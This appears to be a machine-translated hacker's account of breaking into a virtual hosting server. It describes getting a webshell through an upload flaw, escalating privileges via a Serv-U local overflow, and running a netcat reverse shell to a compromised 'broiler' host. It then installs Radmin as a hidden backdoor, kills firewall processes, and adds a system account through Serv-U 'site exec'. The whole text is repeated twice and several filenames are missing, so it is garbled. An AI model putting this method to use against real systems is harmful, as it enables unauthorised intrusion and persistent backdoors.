The focus of this article is to improve webshell permissions and bypass the firewall. Experts should not laugh.
Let's talk less nonsense, let's get to the point.
First, let’s determine the target: ***.com, a common virtual host. I believe it is not difficult for you to obtain webshell using Upfile vulnerabilities. This time we obtained this webshell, not DVBBS, but the software upload and filtering of Free Power 3.6 is not strictly uploaded and filtered. The website ***.com/lemon/ is a free power 3.6 article system. Xr uses and uploads a web *. Anyone who has used the shark knows that this is uploading the content of the asp *. So, uploaded Ocean 2005a and successfully obtained the webshell.
Test the permissions, run set in cmd, and get some information about the host. The system disk is D disk, which also shows that our webshell has running permissions. Then let’s see what’s available in C drive? Is it a dual system? After browsing, I found that there were no system files, only some junk files. It doesn't matter, let's check again, the virtual hosts have serv-u, and this one is no exception, it is 5.0.0.8.
Idea: Upload serv-u local overflow file and use nc to reverse connect to obtain system shell. Have you found that the uploaded component of Ocean 2005a is not easy to use? It doesn’t matter. A component-free upload was modified with rain, and there are 3 files in total, and. It is used locally as uploading to the same folder. The link address in the modification is: ***.com/lemon/ and you can upload it.
After uploading and in H:\long\sun***\lemon (website directory), I found that there is no running permission. It doesn’t matter, according to experience, D:\Documents and Settings\All Users\ should have run permissions under the general system. So I wanted to copy the file, but found that our webshell does not have permission to write D disk.
You can browse D:\program files\serv-u\, it cannot be changed. Do you need to crack the serv-u password? Don't want to.
You can't be so discouraged. I suddenly thought about why the system is not placed on disk C. Could it be that disk C is part of the FAT32 partition? Let me talk about it here. If the host has a system disk of win98, 99% of it is FAT32 partitioned. We have also encountered hosts with Ghost installed. In order to facilitate backup under DOS, its backup disk is generally FAT partitioned. If the system disk is a FAT32 partition, there is no security at all on the website. Although the C drive is not a system drive, we have execution permissions. Haha, copy and to c:\, run " -e 202.*.*.* 888", here 202.*.*.* is our broiler, before that we had run nc -l -p 888.
We successfully obtained a system shell connection. (It seems simple, but in fact we have encountered setbacks here. We found that some versions of NC do not have the -e parameter, and I thought that the NC functions all over the world were the same. Later, I found that different versions of NC interconnection were not successful, and there would be garbled codes, which could not be used. For this reason, uploaded n times, made n errors, and was stupid n times, and finally succeeded. Being a hacker really has to be patient and perseverance.)
While we were happy, we were still not satisfied because this shell was too slow. So, I want to use the Radmin, which we use the most frequently, but in fact, the administrator can find r_server by pressing Alt+Ctrl+Del, and the process is checked, but I still like to use it because it will not be detected. OK, upload, r_server.exe to H:\long\sun***\lemon, and then use the shell I just obtained from nc to copy them to d:\winnt\system32\, and run them respectively: r_server /install , net start r_server , r_server /pass:rain /save .
After a long wait, it finally showed success. I connected it with radmin and found that the connection failed. Haha, I forgot that there is a firewall. Upload pslist and pskill and find backices, *s, etc. Although they can log in after Killing, the server still doesn't work after restarting, and it's not a long-term solution. The firewall is not protected from ports 21, 80, etc., so our thinking is back to serv-u. Download it, overwrite the local machine, add a system account with username xr and password rain on the local machine serv-u, plus all permissions. Then use the old method, upload, write it into D:\program files\serv-u\ using the shell to overwrite the original one. Although I waited for a long time, I succeeded, so I connected with flashfxp, and an error of 530 occurred. Depressed, why did you fail again? (This should be fine based on experience, but why can't you figure it out? Please give me some advice.)
No matter what, we restart serv-u and it will be OK. How to restart it? We started to want to restart the system with shutdown, but then we will lose the nc shell and may be discovered. Later, my eyes lit up. Don’t we have pskill? I just used pslist to find this process: ServUDaemon . Kill it. Then run D:\program files\serv-u\ , please note that it is not.
Okay, here we go up ftp and ls, haha, the system disk is under my control. Can we run system commands? Yes, so that's OK:
ftp>quote site exec net user xr rain /add
Run net user on the webshell and you can see that the addition is successful.
The entire invasion and infiltration ended at this point, and it was cleaned up after a while. We'll start the discussion. In fact, there are many good rootkits that can be used to break through the firewall, but we think that the services provided by the system are the safest backdoor.
Let's talk less nonsense, let's get to the point.
First, let’s determine the target: ***.com, a common virtual host. I believe it is not difficult for you to obtain webshell using Upfile vulnerabilities. This time we obtained this webshell, not DVBBS, but the software upload and filtering of Free Power 3.6 is not strictly uploaded and filtered. The website ***.com/lemon/ is a free power 3.6 article system. Xr uses and uploads a web *. Anyone who has used the shark knows that this is uploading the content of the asp *. So, uploaded Ocean 2005a and successfully obtained the webshell.
Test the permissions, run set in cmd, and get some information about the host. The system disk is D disk, which also shows that our webshell has running permissions. Then let’s see what’s available in C drive? Is it a dual system? After browsing, I found that there were no system files, only some junk files. It doesn't matter, let's check again, the virtual hosts have serv-u, and this one is no exception, it is 5.0.0.8.
Idea: Upload serv-u local overflow file and use nc to reverse connect to obtain system shell. Have you found that the uploaded component of Ocean 2005a is not easy to use? It doesn’t matter. A component-free upload was modified with rain, and there are 3 files in total, and. It is used locally as uploading to the same folder. The link address in the modification is: ***.com/lemon/ and you can upload it.
After uploading and in H:\long\sun***\lemon (website directory), I found that there is no running permission. It doesn’t matter, according to experience, D:\Documents and Settings\All Users\ should have run permissions under the general system. So I wanted to copy the file, but found that our webshell does not have permission to write D disk.
You can browse D:\program files\serv-u\, it cannot be changed. Do you need to crack the serv-u password? Don't want to.
You can't be so discouraged. I suddenly thought about why the system is not placed on disk C. Could it be that disk C is part of the FAT32 partition? Let me talk about it here. If the host has a system disk of win98, 99% of it is FAT32 partitioned. We have also encountered hosts with Ghost installed. In order to facilitate backup under DOS, its backup disk is generally FAT partitioned. If the system disk is a FAT32 partition, there is no security at all on the website. Although the C drive is not a system drive, we have execution permissions. Haha, copy and to c:\, run " -e 202.*.*.* 888", here 202.*.*.* is our broiler, before that we had run nc -l -p 888.
We successfully obtained a system shell connection. (It seems simple, but in fact we have encountered setbacks here. We found that some versions of NC do not have the -e parameter, and I thought that the NC functions all over the world were the same. Later, I found that different versions of NC interconnection were not successful, and there would be garbled codes, which could not be used. For this reason, uploaded n times, made n errors, and was stupid n times, and finally succeeded. Being a hacker really has to be patient and perseverance.)
While we were happy, we were still not satisfied because this shell was too slow. So, I want to use the Radmin, which we use the most frequently, but in fact, the administrator can find r_server by pressing Alt+Ctrl+Del, and the process is checked, but I still like to use it because it will not be detected. OK, upload, r_server.exe to H:\long\sun***\lemon, and then use the shell I just obtained from nc to copy them to d:\winnt\system32\, and run them respectively: r_server /install , net start r_server , r_server /pass:rain /save .
After a long wait, it finally showed success. I connected it with radmin and found that the connection failed. Haha, I forgot that there is a firewall. Upload pslist and pskill and find backices, *s, etc. Although they can log in after Killing, the server still doesn't work after restarting, and it's not a long-term solution. The firewall is not protected from ports 21, 80, etc., so our thinking is back to serv-u. Download it, overwrite the local machine, add a system account with username xr and password rain on the local machine serv-u, plus all permissions. Then use the old method, upload, write it into D:\program files\serv-u\ using the shell to overwrite the original one. Although I waited for a long time, I succeeded, so I connected with flashfxp, and an error of 530 occurred. Depressed, why did you fail again? (This should be fine based on experience, but why can't you figure it out? Please give me some advice.)
No matter what, we restart serv-u and it will be OK. How to restart it? We started to want to restart the system with shutdown, but then we will lose the nc shell and may be discovered. Later, my eyes lit up. Don’t we have pskill? I just used pslist to find this process: ServUDaemon . Kill it. Then run D:\program files\serv-u\ , please note that it is not.
Okay, here we go up ftp and ls, haha, the system disk is under my control. Can we run system commands? Yes, so that's OK:
ftp>quote site exec net user xr rain /add
Run net user on the webshell and you can see that the addition is successful.
The entire invasion and infiltration ended at this point, and it was cleaned up after a while. We'll start the discussion. In fact, there are many good rootkits that can be used to break through the firewall, but we think that the services provided by the system are the safest backdoor.